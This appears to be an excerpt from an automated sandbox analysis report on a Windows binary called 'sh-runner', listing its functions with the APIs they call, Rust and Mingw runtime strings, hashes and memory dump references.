API String ID: 3347127084-3192684347
Opcode ID: 32273e345096ce6446c5a9ad4cf3f378fe07d264ce752498bb7c57f73d2384a9
Instruction ID: 9e69519a3f0f8086727c9b5e0c5e330fd4e59f56e16ab38481a01ead07677e04
Opcode Fuzzy Hash: 32273e345096ce6446c5a9ad4cf3f378fe07d264ce752498bb7c57f73d2384a9
Instruction Fuzzy Hash: 1AB13D66609FC188EB759F39DC403EA77A4EB45789F44003ADA4C0BB99EF38D285CB10

Function 00007FF72BD6AD20 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF72BD6AE3B

Strings

Address %p has no image-section, xrefs: 00007FF72BD6AD92, 00007FF72BD6AEE5
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF72BD6AED1
Mingw-w64 runtime failure:, xrefs: 00007FF72BD6AD57
VirtualProtect failed with code 0x%x, xrefs: 00007FF72BD6AEAE

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 6b5c3ae77c03273f21c1cb82adcd5cdeef0e6daab64777e011a6f5b602d1a484
Instruction ID: d1e99b97ccf063c55b371c7bb006e4200378ae4f3b3bda98240bd2c9bebd19df
Opcode Fuzzy Hash: 6b5c3ae77c03273f21c1cb82adcd5cdeef0e6daab64777e011a6f5b602d1a484
Instruction Fuzzy Hash: CF51A022B09E0681EA18AB19FC416E9A760FF58B94F844135DE5C073A5DF3CE982CF50

Function 00007FF72BD033C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF72BD0344C
closesocket.WS2_32 ref: 00007FF72BD034B2
closesocket.WS2_32 ref: 00007FF72BD03510
setsockopt.WS2_32 ref: 00007FF72BD03547
WSAGetLastError.WS2_32 ref: 00007FF72BD03551

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD034E4
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD034FC

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLastclosesocket$setsockopt
String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 3650012124-3544120690
Opcode ID: d47c76e6e9d720925800198ac07a3b88dbc601ea0d71c1488436e5c7a1cfe4da
Instruction ID: fcb82ef422477da011b8e79dad2efbb9229b9e182aad61e1e693ab2e86651d26
Opcode Fuzzy Hash: d47c76e6e9d720925800198ac07a3b88dbc601ea0d71c1488436e5c7a1cfe4da
Instruction Fuzzy Hash: 6741B431E089918AF725AFA9E8012ECB371EF48364F908135DE9D07BA4EF3CA595C750

Function 00007FF72BD0C000 Relevance: 12.1, APIs: 8, Instructions: 144fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BD0C04F

Part of subcall function 00007FF72BD16A00: ReadFileEx.KERNEL32 ref: 00007FF72BD16A48
Part of subcall function 00007FF72BD16A00: SleepEx.KERNEL32 ref: 00007FF72BD16A6A

WriteFileEx.KERNEL32 ref: 00007FF72BD0C0F8
SleepEx.KERNEL32 ref: 00007FF72BD0C11A
GetLastError.KERNEL32 ref: 00007FF72BD0C148
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BCD3625,?,?,?,?,?), ref: 00007FF72BD0C154
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BCD3625,?,?,?,?,?), ref: 00007FF72BD0C15C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BCD3625,?,?,?,?,?), ref: 00007FF72BD0C244
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BCD3625,?,?,?,?,?), ref: 00007FF72BD0C24C

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$FileSleep$ErrorLastReadWritememset
String ID:
API String ID: 3673338832-0
Opcode ID: e52f2a1764aa238fb1dbfc6f9750715354cb54e67f274e2a414de41ba221774f
Instruction ID: 5d893b8ee3a41a4bab3c18f3ee74f352aebed39f5dca580b58eb9290e363eff3
Opcode Fuzzy Hash: e52f2a1764aa238fb1dbfc6f9750715354cb54e67f274e2a414de41ba221774f
Instruction Fuzzy Hash: 9851A4226086C385E739AF29DC013F9A750FF497C8F888835DD5C5BB99CE3D95859B10

Function 00007FF72BD04470 Relevance: 12.1, APIs: 8, Instructions: 70networkCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BD04494
WSASocketW.WS2_32 ref: 00007FF72BD044D5
WSAGetLastError.WS2_32 ref: 00007FF72BD044E7
WSASocketW.WS2_32 ref: 00007FF72BD0451A
SetHandleInformation.KERNEL32 ref: 00007FF72BD04533
GetLastError.KERNEL32 ref: 00007FF72BD0453C
closesocket.WS2_32 ref: 00007FF72BD04546
WSAGetLastError.WS2_32 ref: 00007FF72BD0454F

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$Socket$HandleInformationclosesocketmemset
String ID:
API String ID: 3407399761-0
Opcode ID: 140b85e330145a5fbd53759121481a4a4443c71e07aa3ac1224e103824d8c2c0
Instruction ID: 677adf1253434ae47974724a300a5e138c063317588ed059c481fb9144f11c93
Opcode Fuzzy Hash: 140b85e330145a5fbd53759121481a4a4443c71e07aa3ac1224e103824d8c2c0
Instruction Fuzzy Hash: 00219321A084518AF728FA6DD8047E96650DB483B4F944734DD7C577E9DE2CF9868F20

Function 00007FF72BD3549F Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 53COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF72BD3550E
memcmp.MSVCRT ref: 00007FF72BD35528

Strings

SPSR_FIQ, xrefs: 00007FF72BD354A2
SPSR_IRQ, xrefs: 00007FF72BD354B5
TPIDRUROTPIDRURWTPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPI, xrefs: 00007FF72BD35501
SPSR_SVC, xrefs: 00007FF72BD354EE
SPSR_ABT, xrefs: 00007FF72BD354C8
SPSR_UND, xrefs: 00007FF72BD354DB

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcmp
String ID: SPSR_ABT$SPSR_FIQ$SPSR_IRQ$SPSR_SVC$SPSR_UND$TPIDRUROTPIDRURWTPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPI
API String ID: 1475443563-2082546588
Opcode ID: a5744e36c4bea7f5d191b94c1d72be41caabd032e735eb1ff01fa44516a9d2bf
Instruction ID: 533a4dca7e775d5b55d060c0f5f48b280e6f42211ca9a5523318eb16c086b408
Opcode Fuzzy Hash: a5744e36c4bea7f5d191b94c1d72be41caabd032e735eb1ff01fa44516a9d2bf
Instruction Fuzzy Hash: 04118F12A1E54380EE383E5D5C403F88591EF28789F845836CE5F8A3A7DD3DE4899E65

Function 00007FF72BD0A2F0 Relevance: 10.9, APIs: 7, Instructions: 445COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,00007FF72BCD34EA), ref: 00007FF72BD0A412

Part of subcall function 00007FF72BD45A75: memcpy.MSVCRT ref: 00007FF72BD45BFF

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BD0A5B1
memset.MSVCRT ref: 00007FF72BD0A7B3

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressSingleWake$memcpymemset
String ID:
API String ID: 1221183280-0
Opcode ID: c98d944e47c1db278127765e89b4a58d2ef7c878acf41f52b467c5e436d244b6
Instruction ID: 8f4468c088582fe6f22923efb3886d5bf456864d2309b6a3b2a67b83caca46e8
Opcode Fuzzy Hash: c98d944e47c1db278127765e89b4a58d2ef7c878acf41f52b467c5e436d244b6
Instruction Fuzzy Hash: 6312C122E08A8285F719AB28EC413F9A7A0EF54754FC88535DE5D537B2DF3CA485CB60

Function 00007FF72BCF7060 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BCF71E9
GetEnvironmentVariableW.KERNEL32 ref: 00007FF72BCF71FB
GetLastError.KERNEL32 ref: 00007FF72BCF7207
GetLastError.KERNEL32 ref: 00007FF72BCF7220

Strings

environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FF72BCF74AD

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID: environment variable not foundenvironment variable was not valid unicode:
API String ID: 2691138088-3632183283
Opcode ID: 757dab13e25a7c8ddd6506cf2420c1fe1d395597a0a294d95c5351c0eeb6cab5
Instruction ID: 7d412fcdb58c27527ba4ad851d9c55e2c7d14e21b7da2c5b43b9c18a8d0e6022
Opcode Fuzzy Hash: 757dab13e25a7c8ddd6506cf2420c1fe1d395597a0a294d95c5351c0eeb6cab5
Instruction Fuzzy Hash: 4BB1A376B04A8285EB24AF6DDC543EDA364FB05B88F844036DE5C5B7A9CF3DE2858710

Function 00007FF72BD1E660 Relevance: 10.7, APIs: 7, Instructions: 249COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BD1E769
GetFullPathNameW.KERNEL32 ref: 00007FF72BD1E77E
GetLastError.KERNEL32 ref: 00007FF72BD1E789
GetLastError.KERNEL32 ref: 00007FF72BD1E7A2
memcmp.MSVCRT ref: 00007FF72BD1E820
GetLastError.KERNEL32 ref: 00007FF72BD1E85A
memcpy.MSVCRT ref: 00007FF72BD1E919

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$FullNamePathmemcmpmemcpy
String ID:
API String ID: 2015650653-0
Opcode ID: 6ec72101eed3a8b9d1e05b762d31c4b4c24d2468d9e7dbc6369698527e32f3da
Instruction ID: a28fdd01e54e00fd0acd69225e83423432ae7d154970f94b306cb2d891b23610
Opcode Fuzzy Hash: 6ec72101eed3a8b9d1e05b762d31c4b4c24d2468d9e7dbc6369698527e32f3da
Instruction Fuzzy Hash: 53A1C462B18B9246EB69AF39DC443F9A255FF84BC8F845035DD4C477AACE7CD2418720

Function 00007FF72BD02370 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

freeaddrinfo.WS2_32 ref: 00007FF72BD023E3
freeaddrinfo.WS2_32 ref: 00007FF72BD025D7
freeaddrinfo.WS2_32 ref: 00007FF72BD0269F

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD024AB, 00007FF72BD0265D
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD0262C, 00007FF72BD02672
, xrefs: 00007FF72BD025A4

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: freeaddrinfo
String ID: $assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 2731292433-2757504381
Opcode ID: b2126607e93d647e9f91e76f4849ef41876095a8296fa520854c0728ff80945c
Instruction ID: 41e38146466cf11f3f3e6719507721f7924edcb0b012c1ec52308efc3da52660
Opcode Fuzzy Hash: b2126607e93d647e9f91e76f4849ef41876095a8296fa520854c0728ff80945c
Instruction Fuzzy Hash: 3DA19C72A05A518AE718EF59E8406FDBBB0FB88B48F918439CE4D03764DF38D981CB50

Function 00007FF72BD22730 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 188networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF72BD227B9

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD22820
peerTcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF72BD229AB
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD22838
TcpStream, xrefs: 00007FF72BD22878
addr, xrefs: 00007FF72BD22911

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast
String ID: TcpStream$addr$assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs$peerTcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs
API String ID: 1452528299-1411357719
Opcode ID: 5a2e41fcac08ccb2f5ed9207fd46638074952570b4c48c36a9c3ef2ce86c36f3
Instruction ID: 2c3a25964047147c33d06c9eda4b50524a579544b6a410b9cbbcd346b6c351b7
Opcode Fuzzy Hash: 5a2e41fcac08ccb2f5ed9207fd46638074952570b4c48c36a9c3ef2ce86c36f3
Instruction Fuzzy Hash: 86918221A1869285FB19AF58E8413FCA370EF45758F848136EE8D17766EF3CE685C720

Function 00007FF72BD15E10 Relevance: 10.7, APIs: 7, Instructions: 185COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BD15F08
GetModuleFileNameW.KERNEL32 ref: 00007FF72BD15F15
GetLastError.KERNEL32 ref: 00007FF72BD15F21
GetLastError.KERNEL32 ref: 00007FF72BD15F3A
GetLastError.KERNEL32 ref: 00007FF72BD15FD6
SetCurrentDirectoryW.KERNEL32 ref: 00007FF72BD160BA
GetLastError.KERNEL32 ref: 00007FF72BD160EA

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$CurrentDirectoryFileModuleName
String ID:
API String ID: 1505103792-0
Opcode ID: 4813931b110c6182fb8258efcf567a37ceb1165433f20795709e4602d9828197
Instruction ID: 38a658e53c2b1576bd602c2a5e5046580a30c3cc97469b06837dcca15433f853
Opcode Fuzzy Hash: 4813931b110c6182fb8258efcf567a37ceb1165433f20795709e4602d9828197
Instruction Fuzzy Hash: FE71E262F1468189FB29AB79EC043F9A255FF44BD8F805135EE1C577DADF2CA2818710

Function 00007FF72BD23418 Relevance: 10.7, APIs: 7, Instructions: 176processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD23446
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF72BD2355E
memset.MSVCRT ref: 00007FF72BD2357F
Module32FirstW.KERNEL32 ref: 00007FF72BD23591

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseCreateFirstHandleModule32SnapshotToolhelp32memset
String ID:
API String ID: 33593729-0
Opcode ID: 21daa49ce758a76851dd5922f0c5d513dd76b202e35a61d6fd3b3e2c72f029fb
Instruction ID: 01046f51b9eefe508333a49c7b6034b7a308b63d24e36a23d3f38df343005330
Opcode Fuzzy Hash: 21daa49ce758a76851dd5922f0c5d513dd76b202e35a61d6fd3b3e2c72f029fb
Instruction Fuzzy Hash: CB81E861A086C24AEB78AB29CC147F96361FB05BE8FC48135DE5C1B7D6CF3C95858B24

Function 00007FF72BD09DD0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

WakeByAddressAll.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BD09E50
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BD09E74
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BD09EDA
WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BD09EF5
GetLastError.KERNEL32 ref: 00007FF72BD09EFF

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72BD09F2C, 00007FF72BD09FC6

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Address$Wake$Single$ErrorLastWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 798958160-2333694755
Opcode ID: e2c6ed504ba8107884ec7595559c41f4a93c5bc78c5009b79800c88f58580a1a
Instruction ID: 9e42f25feaebd090eaa600f84de803bd1317255bab3ecb4d48f2f31c42620b52
Opcode Fuzzy Hash: e2c6ed504ba8107884ec7595559c41f4a93c5bc78c5009b79800c88f58580a1a
Instruction Fuzzy Hash: 2351DB21A0D68246FA29AF6DAC002FAA760EF24754F844935DFDD036E2CE3CF4418B20

Function 00007FF72BD03840 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF72BD03889
WSAGetLastError.WS2_32 ref: 00007FF72BD038C6
setsockopt.WS2_32 ref: 00007FF72BD0399A
WSAGetLastError.WS2_32 ref: 00007FF72BD039AC

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD03930
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD03948

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
